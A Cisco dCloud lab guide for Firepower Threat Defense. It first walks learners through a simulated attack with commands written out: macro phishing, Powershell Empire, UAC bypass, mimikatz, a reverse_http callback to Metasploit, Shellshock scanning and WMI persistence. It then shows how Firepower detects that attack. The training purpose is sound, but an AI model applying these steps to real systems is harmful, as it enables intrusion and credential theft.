Vous êtes sur la page 1sur 54

Cisco dCloud

Firepower Threat Defense v1


Last Updated: 20-OCTOBER-2016

About This Solution


The lab is aimed at technical decision makers, security engineers and CSOs with an interest in security technology. The focus is
not on how to install or configure (the Before Phase). Instead, we will start working with a preconfigured system. The focus is
instead on understanding how to work with this system trying to detect and mitigate an attack (The After Phase).

NOTE: The lab assumes an understanding of techniques used by attackers in the Attack Kill Chain.

The lab does not assume any prior training on Firepower.

About This Lab


This lab includes the following scripted scenarios:

Scenario 1: The Attackassume the role of an attacker, perform a realistic attack against the target organization, use phishing
with a malicious Excel to take control of a client on the inside of the network, and leverage the compromised client to attack
other systems on the inside.

Scenario 2: Getting Started with Firepower Management Centerbecome familiar with the Firepower Management Center
(FMC) in order to understand the overall structure of the FMC, including how FMC automatically discovers the network it is
protecting, the operating systems, the applications relevant vulnerabilities, and logged in users. This also focuses on a typical
NGFW policy, understanding the ability to create policies to control applications and to leverage user identity from Cisco
Identity Services Engine (ISE).

Scenario 3: Detection and Analysisinvestigate a reported attack (the one from Scenario 1) using Firepower Management
Center, looking at Indicators of Compromise (IoCs) and correlating events from IPS, Advanced Malware Protection (AMP),
and Security Intelligence to understand the attack and the impact.

Scenario 4: Reportinganalyze and customize sample reports.

Demonstration Profile and Contact Links


For more information:

View the demonstration content on Cisco dCloud at https://dcloud-cms.cisco.com/?p=23330.

Visit Cisco dCloud Help pages at https://dcloud-cms.cisco.com/help for more information and training materials.

Access all available Cisco dCloud demos at https://dcloud.cisco.com.

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 1 of 54
Cisco dCloud

Requirements
The table below outlines the requirements for this preconfigured demonstration.

Table 1. Requirements

Required Optional
Laptop Cisco AnyConnect

Topology
This content includes preconfigured users and components to illustrate the scripted scenarios and features of the solution. Most
components are fully configurable with predefined administrative user accounts. You can see the IP address and user account
credentials to use to access a component by clicking the component icon in the Topology menu of your active session and in the
scenario steps that require their use.

Figure 1. dCloud Topology

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 2 of 54
Cisco dCloud

Figure 2. Lab Topology

Preconfigured User Information

The following information applies to the preconfigured users in this lab:

Evilkali1 and Evilkali2these are the systems that launch the attacks in Scenario 1.

Workstation A and Workstation Bthese are clients inside the target organization. These clients connect to their network via
VPN (AnyConnect). With this, we illustrate both how Firepower Management Center can get user identity from ISE, and how
FMC can put an offending endpoint in quarantine automatically.

The VPN Clientshave physical IP addresses (198.18.133.x) and virtual IP addresses for VPN (198.19.19.x). The student will
connect to the physical IP addresses when accessing these machines, but the addresses seen after VPN termination will be
198.19.19.x.

IoT Surveillance camerathis is the ultimate target of the attack in this scenario.

Table 2. Preconfigured User Information

Device User ID Password


Jumper 198.18.133.135 DCLOUD\administrator C1sco12345
Evilkali1 198.18.133.110 Evilkali2 root C1sco12345
198.18.133.11
WorkstationA 198.19.30.38 DCLOUD\mordiac C1sco12345
WorkstationB 198.19.30.37 DCLOUD\scratchy

fmc 198.19.10.10 dcloud C1sco12345

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 3 of 54
Cisco dCloud

Get Started
BEFORE PRESENTING

Cisco dCloud strongly recommends that you perform the tasks in this document with an active session before presenting in front
of a live audience. This will allow you to become familiar with the structure of the document and content.

It may be necessary to schedule a new session after following this guide in order to reset the environment to its original
configuration.

PREPARATION IS KEY TO A SUCCESSFUL PRESENTATION.

Follow the steps to schedule a session of the content and configure your presentation environment.

1. Browse to dcloud.cisco.com, select the location closest to you, and log in with your Cisco.com credentials.

2. (Optional) Register and configure your router if this is the first time you will use the router with dCloud. [Show Me How]

3. Schedule a session. [Show Me How]

4. Test your connection. [Show Me How]

5. Verify that the status of your session is Active in My Dashboard > My Sessions.

NOTE: It may take up to 10 minutes for your session to become active.

6. Click View to open the active session.

7. For best performance, connect to the Jumper with Cisco AnyConnect VPN [Show Me How] and the local RDP client on
your laptop [Show Me How]

Jumper: 198.18.133.135, Username: DCLOUD\Administrator, Password: C1sco12345

NOTE: You can also connect to the workstation using the Cisco dCloud Remote Desktop client [Show Me How]. The dCloud
Remote Desktop client works best for accessing an active session with minimal interaction. However, many users experience
connection and performance issues with this method.

8. On the workstation, open Firefox and connect to the Firepower Management Center at https://fmc.

9. Test connectivity to Workstation A by clicking the icon on the desktop, and click Use another account to login with
Username: DCLOUD/mordiac and Password: C1sco12345. Click OK.

Figure 3. Workstation Icons and Login

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 4 of 54
Cisco dCloud

10. Repeat steps to test connectivity to Workstation B by clicking the icon on the desktop, and click Use another account to
login this time with Username: DCLOUD/scratchy and Password: C1sco12345. Click OK.

Figure 4. Workstation Icons and Login

11. From Workstation A, test connectivity to the critical IoT device (which contains incredibly sensitive information) by opening
the Chrome Browser, and navigating to http://iot.dcloud.cisco.com.

12. Open PuTTY to check connectivity to evil1 and evil2.

13. Choose the machine, click Load, and then click Open. Log in using username root and password C1sco12345.

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 5 of 54
Cisco dCloud

Figure 5. PuTTY Configurations for evil1 and evil2

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 6 of 54
Cisco dCloud

Scenario 1. The Attack


In this scenario, we assume the role of the attacker and carry out a vicious attack. The attacker has done some research and found
out that

There are two employees, Scratchy (CFO) and Mordiac (ITadmin) who are looking for new jobs (both just updated their
Linkedin Profiles).

There is an internal server iot.dcloud.cisco.com at 198.19.10.211 with some juicy secrets.

Steps
1. From the workstation, open a SSH window and connect to evil2 (198.18.133.111). Logon with root/C1sco12345.

Figure 6. Log in

2. Attempt to get to the internal server iot.dcloud.cisco.com directly from the attacking machine. Scan it with nmap to see if it
has ports 80 or 443 open.
nmap P0 198.19.10.211 p 80,443

NOTE: The website www.nmap.org is a well-known tool for attackers and penetration testers that does scanning and much more.

3. From the result below it shows that the attacker cannot reach the machine directly (note the word filtered).
root@evilkali2:~# nmap -P0 198.19.10.211 -p 80,443

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-03-17 16:31 GMT


Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 16:31 (0:00:00 remaining)
Nmap scan report for 198.19.10.211
Host is up.
PORT STATE SERVICE
80/tcp filtered http
443/tcp filtered https

4. Since the attacker cannot access the target directly, an attempt will be made to compromise a client computer. Attacker has
prepared a number of Excels with malicious macros and tried to make sure it will bypass Antivirus.

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 7 of 54
Cisco dCloud

5. On evil2, start Powershell Empire and wait for a nave end user to open the Excel.
root@evilkali2:~# cd /opt/Empire
root@evilkali2:/opt/Empire# ./empire

6. The following screen displays.

Figure 7. Empire Log In

NOTE: Powershell Empire is a Post-Exploitation framework for Windows environments. Powershell Empire uses Powershell (a
built in scripting language in Windows) to do its work which can be very stealthy and difficult to detect. It is typically used at later
stages in the attack kill chain (privilege exploitation, Lateral Movement, Persistence) but in this lab we will also use it for the initial
exploitation.

7. Use Remote Desktop to access WorkstationA (login with DCLOUD\mordiac and password C1sco12345).

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 8 of 54
Cisco dCloud

8. Verify that AnyConnect VPN session is established by clicking on the arrow in bottom right corner. Click the AnyConnect
icon. If you are not connected, press the connect button.

Figure 8. Any Connect

9. On Workstation A, open the Firefox browser. The homepage displays.

10. Click Download files.

Figure 9. Firefox on Workstation

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 9 of 54
Cisco dCloud

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 10 of 54
Cisco dCloud

11. This displays a number of Excel files to download. Click the link Catjob2.xls and try to download it. It will fail, as this type of
known malware can be stopped immediately.

Figure 10. Excel Files

12. Click Job-Obscene-Salary.xls. This file is a Zero Day, and carefully coded to bypass defenses.

13. Save the file to the Desktop.

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 11 of 54
Cisco dCloud

Figure 11. Job_Obscene-Salary

14. Double-click the downloaded Excel file from the desktop.

NOTE: You may be prompted to Enable Editing and Enable Content. These are security measures, and are designed to
discourage end users from running macros. However, using social engineering it is often possible to bypass this defense.

NOTE: Do NOT quit the Excel application until after this lab.

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 12 of 54
Cisco dCloud

Figure 12. Enable Editing

Figure 13. Enable Content

15. Return to the SSH console to evilkali2. The screen should now indicate that the Powershell Empire has got its first client.

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 13 of 54
Cisco dCloud

Figure 14. Powershell Empire

16. That shows that the Excel file was malicious. Check if any of the AV vendors at Virustotal would have picked it up.

17. From WorkstationA, open a tab in the browser and navigate to http://virustotal.com to submit the file.

Figure 15. Virus Total Scan

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 14 of 54
Cisco dCloud

18. Submit the newly downloaded file. Your output should look like below. Most likely, very few (if any) AV vendors detected the
file as malicious.

Figure 16. Virus Total

19. On your Evilkali2 SSH console with Empire, go to agents mode and watch your agent. The name is random.
(Empire) > agents
[*] Active agents:
Name Internal IP Machine Name Username Process Delay Last
Seen
--------- ----------- ------------ --------- ------- ----- -----
---------------
XZ1D4KMFFBS2CPC1 198.19.30.38 WORKSTATIONA DCLOUD\mordiac powershell/2936 5/0.0 2016-
03-17 18:16:56

(Empire: agents) >

20. Change the name to something shorter, for example, the letter A.

NOTE: Use <tab> to complete command so you only have to type the first letter of the Agent Name.
(Empire: agents) > rename <name of agent as per above> A

21. Interact with your agent by typing interact <Name>.

NOTE: You can use <tab> and only type Interact plus the first letter of the agent (in picture above that would be interact X + tab).
(Empire: agents) > interact A
(Empire: A) >

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 15 of 54
Cisco dCloud

22. Verify that we can now control the machine, change directory, list files, steal files, upload files.

(Empire:A) > cd C:\Users\Mordiac\Desktop


(Empire: A) > pwd
(Empire: A) >
Path
C:\Users\Mordiac\Desktop
(Empire: A) > dir
(Empire: A) >
LastWriteTime length Name
------------- ------ ----
3/28/2016 3:44:34 PM Tools
3/7/2016 8:47:14 PM 282 desktop.ini
3/28/2016 7:09:52 PM 52224 Job-Obscene-Salary.xls
3/12/2016 1:47:22 PM 0 MORDIAC-A.txt
(Empire: A) > download MORDIAC-A.txt
(Empire: A) >
[*] File download of C:\Users\Mordiac\Desktop\MORDIAC-A.txt completed

23. Empire has many different modules (written in powershell), some of which we will use during this lab. To show the control we
have right now use the module trollsploit/message. Once in a module you can see its configurable parameters by typing info.
(Empire: A) > usemodule trollsploit/message
(Empire: trollsploit/message) > info
.
Options:
Name Required Value Description
---- -------- ------- -----------
MsgText True Lost contact with the Message text to display.
Domain Controller.
Then run the module by typing run.

(Empire: trollsploit/message) > run


[>] Module is not opsec safe, run? [y/N] y
(Empire: trollsploit/message) >
Job started: Debug32_pfefb

24. On WorkstationA, observe the message box.

NOTE: This is not so stealthy, so a real attacker would not do this without a good reason (such as to show a message box that
prompts for username passwords to gather credentials).

Figure 17. Lost Contact Message Box

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 16 of 54
Cisco dCloud

25. Next the attacker wants to elevate privileges to system privileges. This is very easy here since Mordiac was (foolishly)
logged in as administrator. So all that is needed here is to bypass Microsoft UAC (user access control), see
http://www.powershellempire.com/?page_id=380.

26. From evilkali2, type back to go back to interact with A, then bypassuac test (test is the name of the listener) and answer yes
to the warning that module is not opsec safe (meaning it touches harddisk, leaving traces that AV or defensive tools could
detect).

(Empire: trollsploit/message) > back


(Empire: A) >
(Empire: A) > bypassuac test
[>] Module is not opsec safe, run? [y/N] y
(Empire: A) >

27. The output displays (the name of the agent will vary), meaning you will have a new agent connection but with higher
privileges.

Figure 18. Output

28. Interact with the new session, with system privileges.

29. Enter agents and note which session has an asterisk (*) in the username column.
(Empire: A) > agents
[*] Active agents:
Name Internal IP Machine Name Username Process Delay Last
Seen
--------- ----------- ------------ --------- ------- ----- -----
---------------
A 198.18.133.38 WORKSTATIONA DCLOUD\mordiac powershell/3484 5/0.0 2016-
03-28 19:28:26
MZK3MLW4PGPFZNU1 198.18.133.38 WORKSTATIONA *DCLOUD\mordiac powershell/2228 5/0.0 2016-
03-28 19:28:26

30. Rename the session with an asterisk to (for example) AA and interact with it.

NOTE: Remember you only need to type the first character(s) of agent name and then TAB.
(Empire: agents) > rename MZK3MLW4PGPFZNU1 AA
(Empire: agents) > interact AA
(Empire: AA) >

31. The attacker now has a session with system privileges, allowing the attacker all privileges on the local machine, which
includes modifying system files and dumping password hashes.

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 17 of 54
Cisco dCloud

32. Enter mimikatz to see what permissions are available.


(Empire: AA> mimikatz

33. The output will look similar to the below, if you scroll up you will see password and password hashes.

Figure 19. Output

NOTE: Remember the attackers objective: To break into the IOT device iot.dcloud.cisco.com at 198.19.10.211. In order to do so
he may need to add new tools to the toolbox.

NOTE: We are now going to move add control of the compromised client to another attack framework: metasploit. Whilst
Powershell Empire allows for very easy and stealthy post exploitation in a windows environment using the Powershell scripting
language, Metasploit can be used to attack any system regardless of operating system.

34. Keep the SSH window open to evil2, but start a new SSH session to evil2 (198.18.133.111) and logon with
root/C1sco12345.

35. Start metasploit console (msfconsole) with the script file multi.rc.
root@evilkali2:~# msfconsole -r multi.rc

36. The following displays.

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 18 of 54
Cisco dCloud

Figure 20. Command Output

NOTE: We now have two SSH sessions to evil2. With the first of them we are running Powershell Empire, a formidable post
exploitation framework in windows environments. But in order to attack the Linux based IoT device we want to create an alternative
control channel to the Metsploit framework (our second SSH session).

37. From the first SSH session with Empire, while interacting with a session with system privileges, enter the following
commands. This creates an outgoing http command control session to your metasploit listener.
(Empire: AA) > usemodule code_execution/invoke_shellcode
(Empire: code_execution/invoke_shellcode) > set Listener Meterpreter
(Empire: code_execution/invoke_shellcode) > set Payload reverse_http
(Empire: code_execution/invoke_shellcode) > run

38. Now watch your second SSH session (the one with Metasploit listening). The output should look similar to below, indicating
that we now control the compromised client from Metasploit framework.

Figure 21. Second SSH Session Output

39. In the second SSH session (with metasploit), create a route to allow the Metasploit framework to attack targets on the inside of
the network via the compromised client using meterpreter session 1.

NOTE: The syntax is route add <network> <mask> <session>.


meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > route add 198.19.10.0 255.255.255.0 1

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 19 of 54
Cisco dCloud

Figure 22. Matasploit Framework

NOTE: Understand how the attack is going via the compromised client, even though the IoT device is not reachable directly.

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 20 of 54
Cisco dCloud

40. Finally we should attack the IOT device using the previous meterpreter session.

41. From the second SSH windows (with the meterpreter session), invoke a meterpreter resource script iot2.rc that will setup the
attack to scan for the Bash Shellshock vulnerability (CVE-2014-6271). Even though this vulnerability is from September 2014,
the attacker has some hope because IoT systems are often not patched regularly.
msf exploit(handler) > resource iot2.rc
[*] Processing iot2.rc for ERB directives.
resource (iot2.rc)> use auxiliary/scanner/http/apache_mod_cgi_bash_env
resource (iot2.rc)> set targeturi /cgi-bin/vulnerable.cgi
targeturi => /cgi-bin/vulnerable.cgi

42. Run the exploit.


msf auxiliary(apache_mod_cgi_bash_env) > exploit

NOTE: If successful, the exploit will execute the Unix ID command on the server, proving it is possible to execute arbitrary
commands on the IoT server (under the context of the www user).

In this case however it is not working (no user info returned) as per below. The reason for that (IPS block) will be clear in lab 3.

Figure 23. Run the Exploit

43. A reasonable next step for the attacker is to gain persistence, meaning creating a backdoor that would survive a reboot. From
the attackers perspective, preferably one that is not caught by any AntiVirus. Powershell Empire (our first SSH session) will
achieve this goal.

44. On our first SSH session with Powershell Empire, use the module persistence/elevated/wmi.
(Empire: AA) > usemodule persistence/elevated/wmi
(Empire: persistence/elevated/wmi) > set Listener test
(Empire: persistence/elevated/wmi) > run
[>] Module is not opsec safe, run? [y/N] y
(Empire: persistence/elevated/wmi) >
WMI persistence established using listener test with OnStartup WMI subsubscription trigger.

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 21 of 54
Cisco dCloud

45. Reboot WorkstationA by typing the following command in the Windows start window.

shutdown t 0 r

NOTE: Be careful typing this. Do not forget r or the system will just shut down and not restart.

Figure 24. Reboot Workstation

46. Wait 1-2 minutes and then login with remote desktop.

47. In 5 minutes, you will have a new connection from the machine.

Conclusion

This concludes the first scenario. To summarize what has happened:

The attacker wanted to attack the internal IoT server to control the video camera.

The attacker tried to attack the IoT server directly but it seemed to be blocked by the firewall.

The attacker then launched a phishing attack against a nave user on the inside, using a zero day malware package as an
excel Macro, taking control of the machine on the inside.

The attacker escalated privileges to that of system, and could dump usernames/passwords on the machine.

The attacker established persistence, so he will remain in the network even after a reboot.

The attacker then decided to go after the IoT server using the Bash Shellshock attack. This attack may have failedmaybe an
IPS blocked it, or the server was patched. You will find out in Scenario 3.

The attacker is still in the network and will seek new ways to attack. One of them may be successful.

This is now a race against time.

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 22 of 54
Cisco dCloud

Scenario 2. Getting Started with Firepower Management Center


In this scenario, we will login to FMC and familiarize with the GUI. We will look at:

Context Explorer, that Firepower learns about the network it is protecting, the hosts, their operating systems, the applications,
the vulnerabilities and the logged in users

How Firepowers knowledge about the network it is protecting can be used to automatically tune IPS rules

The NGFW ruleset

How FMC can get identity information from ISE or Active Directory

Device Configuration: NAT, Interfaces and Routing

Steps
1. From the Workstation, open the Firefox browser and logon to fmc (https://fmc), using username: dcloud and password:
C1sco12345.

2. Select Analysis/Context Explorer and adjust the time period to the last day.

Figure 25. Adjust Time of Day

NOTE: Some of the sections may take a long time to load in this virtual setup. The reason for this is being investigated.

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 23 of 54
Cisco dCloud

3. A key feature of Firepower Management Center (FMC) is that it keeps track of the operating systems and applications used by
each host on the internal network, as well as the logged in users and vulnerabilities. Scroll down to the section on Network
Information. As you can see, FMC has discovered different Operating Systems.

Figure 26. Context Explorer

Figure 27. Context Explorer

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 24 of 54
Cisco dCloud

4. Scroll down to Application Protocol Information to examine what applications have been discovered.

NOTE: It is possible to pick any section in a pie-chart, or any staple in a bar and click it to be able to do further filtering or drilling
down into analysis (jumping to events). For hosts (ip addresses) it is also possible to view the host profile. Navigate to the network
information, find 198.19.19.38 (workstation-A) and select View Host Information

Figure 28. Network Information

Figure 29. Host Profile

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 25 of 54
Cisco dCloud

5. Look at the Host Information. This section displays logged in users, Indicators of Compromise, Operating systems,
Applications, and Vulnerabilities for that particular host.

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 26 of 54
Cisco dCloud

6. Scroll down to examine the Applications Discovered on the host.

NOTE: Point out the exclamation mark (!) to the left on certain applications. This is because Firepower has detected a new
application that is not in the configured whitelist. This whitelist (that can be learned by inspecting traffic to and from a host) can be
used to detect when something changes in the network (such as a new application). This can be very useful in static environments
(medical technical networks, SCADA, some DMZs etc.

Figure 30. New Applications with Exclamation Point

7. Scroll down to examine the potential vulnerabilities tracked on this host.

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 27 of 54
Cisco dCloud

Figure 31. Vulnerabilities

NOTE: The knowledge FMC has gained of the network: The hosts, The Operating Systems, the applications and vulnerabilities
can be used to automatically fine tune the IPS policies.

8. Select Policy -> Access Control -> Intrusion and edit the dCloud-IPS policy by clicking the pencil symbol.

Figure 32. Edit the dCloud-IPS Policy

9. Firepower recommends changes to the IPS configuration based on its knowledge of the network. Click View Recommended
Changes below to see what changes are recommended.

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 28 of 54
Cisco dCloud

Figure 33. Edit Policy Recommendations

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 29 of 54
Cisco dCloud

10. There are more than 2100 IPS signatures, which Firepower recommends you to change (based on its knowledge of the
network). The advantages of tuning IPS ruleset are that you both gain performance but also reduce the risk of false positives.

Figure 34. IPS SIgnatures

11. Do not apply the Firepower recommendations.

12. To look at NGFW policies, select Policies->Access Control -> Access Control and click the pen symbol.

Figure 35. Access Control Policies

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 30 of 54
Cisco dCloud

13. Examine the different options for the NGFW policy. It is possible to have different rules depending on Active Directory Group,
Application, URL category but also attributes from Cisco ISE. For each rule, it is possible to define different IPS policies or
policies for AMP and logging.

Figure 36. Policy Options

14. Try adding a new rule (or edit an existing rule) to examine the options for applications, URLs, Users and ISE attributes. You do
not have to create the rule and can cancel out after investigating what options are available.

Figure 37. User options (Active Directory Groups)

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 31 of 54
Cisco dCloud

Figure 38. ISE User Attributes

Figure 39. Application Choices

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 32 of 54
Cisco dCloud

15. Examine the SSL decryption policies. Select Policies->Access->SSL and edit the Dcloud-SSL Policy.

NOTE: It may be desirable in many cases to control when to decrypt SSL for reasons of policy (law and compliance) or
performance.

It is possible to decrypt/not decrypt based on a number of criteria such as source ip address, destination ip address, user identity
(e.g do not decrypt HR traffic), destination URL category (e.g do not decrypt finance) and so on.

Figure 40. dCloud-SSL Policy

16. On WorkstationA, test the decryption policy by trying to download a malicious file again using https:// from WorkstationA
and Internet Explorer

17. Navigate to https://www.evilchi.com/Catjob3.xls. This download will not succeed since the Advanced Malware Protection
(AMP) will block this file.

Figure 41. Download Blocked

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 33 of 54
Cisco dCloud

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 34 of 54
Cisco dCloud

18. Examine Device configuration. Select Devices->Device Management and edit the device vFTD.

Figure 42. Device Management

19. Examine the configuration options.

NOTE: With Firepower Threat Defense (FTD) software FMC can configure all features such as NAT, Routing (static routes, BGP,
OSPF), DHCP server settings etc. Please feel free to investigate the different options but do please avoid making changes.

Figure 43. Configuration Options

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 35 of 54
Cisco dCloud

Scenario 3. Detection and Analysis


In this scenario we will focus on the Detection and Analysis capabilities of Firepower, using the attack in lab 1 as an example.

Firepower makes it easy to identify hosts that are compromised, by collecting Indicators of Compromise (IOCs) per host. An IOC
is a reasonable suspicion that a host may be compromised and under the control of somebody else. It is also possible to quickly
understand the context of the host, Operating System, running applications, vulnerabilities, malware, logged in users, and
connections to and from this host.

Steps
1. From the workstation, log in to the Firepower Management Center with Firefox, using https://198.18.133.10 with Username:
dcloud and password: C1sco12345.

2. Select Analysis -> Context Explorer. This is a good starting point for the Security Analysts

NOTE: Look at the Indications of Compromise (IoCs). One host (198.19.19.38) has experienced many IoCs.

Figure 44. Indications of Compromise

NOTE: FMC collects the Indicator of Compromises (IoCs) per host, making it easy for the Security Analyst to identify the hosts that
need attention now.

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 36 of 54
Cisco dCloud

3. The host 192.19.19.38 has a couple of Indicators of Compromise. Have a further look at this host by right clicking the blue
bar in the Indications by Host section and choose View Host Information.

Figure 45.

4. The Host Information View should open in a different window (see below).

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 37 of 54
Cisco dCloud

Figure 46. Host Information

NOTE: Learn more about the machine that may have been compromised.

FMC offers you contextual information about a potentially compromised machine, such as

What user is logged in to the machine now?

What users have been logged in to the machine

What operating system is it? (Windows, Linux)

What applications have been observed?

What vulnerabilities could this machine have?

What indicators of compromises has been seen with this machine?

What connection events (firewall L3/L4 connections) relate to this machine?

What file events relate (files uploaded/downloaded) to this machine?

What malware events (files that are malware) relate to this machine?

What IPS events relate to this machine?

5. From Host Profile, check what users have been logged on to the machine.

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 38 of 54
Cisco dCloud

Figure 47. Host Profile

NOTE: Quiz yourself on why is it important to understand that mordiac has been logged on to the machine?

Mordiac may be the future President.

Mordiac is a CFO, so he has access to critical financial reports that could be secret.

Mordiac is a domain admin, so compromising his credentials with something like mimikatz would put all the credentials in the whole
organization at jeopardy! (including CFOs and any future Presidents).

6. From the Host Profile, check what operating system the compromised machine is running.

Figure 48. Operating Systems

7. From the Host Profile, we have Indicators of Compromise. Check what Malware events are associated with this host.

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 39 of 54
Cisco dCloud

Figure 49. Malware Summary

Figure 50. Host Profile

8. Click the red wheel icon to view the Network File Trajectory for this file.

Figure 51. Red Wheel Symbol

9. Inspect the Network File Trajectory.

NOTE: The file was allowed at first, since it was a zero day malware.

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 40 of 54
Cisco dCloud

Figure 52. Network File Trajectory

NOTE: Firepower AMP records all file transfers, without regard to assumed disposition (unknown, clean or malware) and is able to
change its mind later and tell you about it! This is called retrospection!

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 41 of 54
Cisco dCloud

10. Examine the Threat Score (Dynamic Analysis, or Sandboxing Result). In this case the file was convicted (deemed
malicious) because of Dynamic Analysis (sandboxing). You can get details of the dynamic analysis by clicking
the Threat Score symbol:

Figure 53. Threat Score

Figure 54. Dynamic Analysis Summary

NOTE: The Dynamic Analysis Summary shows some clear indicators why this file (that was not caught by any AV at the time) is
clearly malicious

Office Documents should not launch Powershell!

Office Dcouments should not open up network communications!

Powershell with encoded commands..??

DNS Queries to Non-Existent domains are suspicious indeed!

Examine the Threat Score (Dynamic Analysis, or Sandboxing Result).

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 42 of 54
Cisco dCloud

NOTE: Once the cloud intelligence has identified the file as malicious it will be blocked immediately by any security appliance fed
by the TALOS intelligence feed (other Cisco NGFWs, Web Security Appliances, Email Security Appliances or AMP for endpoints).

11. Verify that the same file (Obscene-Salary.xls) is now blocked immediately.

12. Open your remote desktop connection to Workstation A (the one that was initially compromised).

13. Select the link for Download files and try to download it again. The file fails.

Figure 55. Download Failure

NOTE: Depending on browser the file may be partially downloaded, but it will no no longer be a threat.

14. Examine the Intrusion Events associated with the host.

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 43 of 54
Cisco dCloud

Figure 56. Host Profile

15. Conduct a high level investigation of the intrusion attempt.

NOTE: We can quickly see that, this is high priority, Impact 2 Alarm (host potentially vulnerable), the attack was blocked, the
attacker was the IP of WorkstationA, a client on the inside, the victim was the IOT device, the attack was a Bash CGI environment
variable injection (a.k.a Bash Shellshock).

Figure 57. High level Investigation

16. Note how this mirrors the attack from Scenario 1.

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 44 of 54
Cisco dCloud

Figure 58. Attack Mirror

NOTE: This Intrusion event maps against the previous attack attempt against the IoT device

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 45 of 54
Cisco dCloud

17. Check the Security Intelligence Events.

Figure 59. Security Intelligence Events

18. This following displays.

Figure 60. Security Intelligence Events

NOTE: The host seems to be try communicating with a host in Singapore (SGP). This is however blocked by the NGFW.

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 46 of 54
Cisco dCloud

Conclusion

This concludes the Detection/Analysis exercise. To summarize:

We noticed a host (workstationA, which had couple of Indications of compromise.

We first examine the host information, which told us the operating systems, applications etc. It also told us that the user logged
on to the host at the time of the event was mordiac, a domain admin.

Investigating the malware events showed us that this host had received an Excel file from a server in China. This file was
retrospectively convicted, meaning at first it was unknown and had to be into the network. But at a later stage Firepower
changed the verdict to malware.

The dynamic analysis of this file would also tell us of the nature of the file, that it was a macro launching a powershell.
Complimentary analysis from Virustotal or Threatgrid would have shown that this was a zero-day malware.

We also learned that workstationA has been attacking the critical IOT server. This attack was however blocked by the IPS.

We also learned that workstationA is communicating to a known CnC in Singapore (though this traffic is blocked).

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 47 of 54
Cisco dCloud

Scenario 4. Reporting
In this scenario, we will focus on the FMC Dashboards and Reporting. FMC allows for very rich and customizable data analysis
and reporting. In the short time available we will only touch on this subject briefly.

Steps
1. From the Workstation, open the Firefox browser and logon to fmc (https://fmc), using username: dcloud and password:
C1sco12345.

2. Select Overview->Dashboards->Summary Dashboard.

NOTE: Note that there are many different predefined dashboards (Files, Security Intelligence and many more). Each dashboard
also has different tabs (for example, Network, Threat, Intrusion Events etc).

3. Click the Threats tab.

Figure 61. Summary Dashboards

NOTE: The dashboards can be used both as a graphical overview, for on-demand or scheduled reporting but it is also possible to
use them to drill into analysis, just by clicking on any of the links in the widgets. For example, Clicking on the CnC link under the
Connections by Security Intelligence shows the details of Security Intelligence (Reputation based drops to CnC).

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 48 of 54
Cisco dCloud

Figure 62. CnC Link

4. You can Export/Import or create your own dashboard by selecting Overview->Dashboards->Management.

5. Click Create Dashboard.

Figure 63. Create Dashboard

2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 49 of 54
Cisco dCloud

6. Copy the new dashboard from the Summary Dashboard we just examined. Name your new dashboard and click Create.

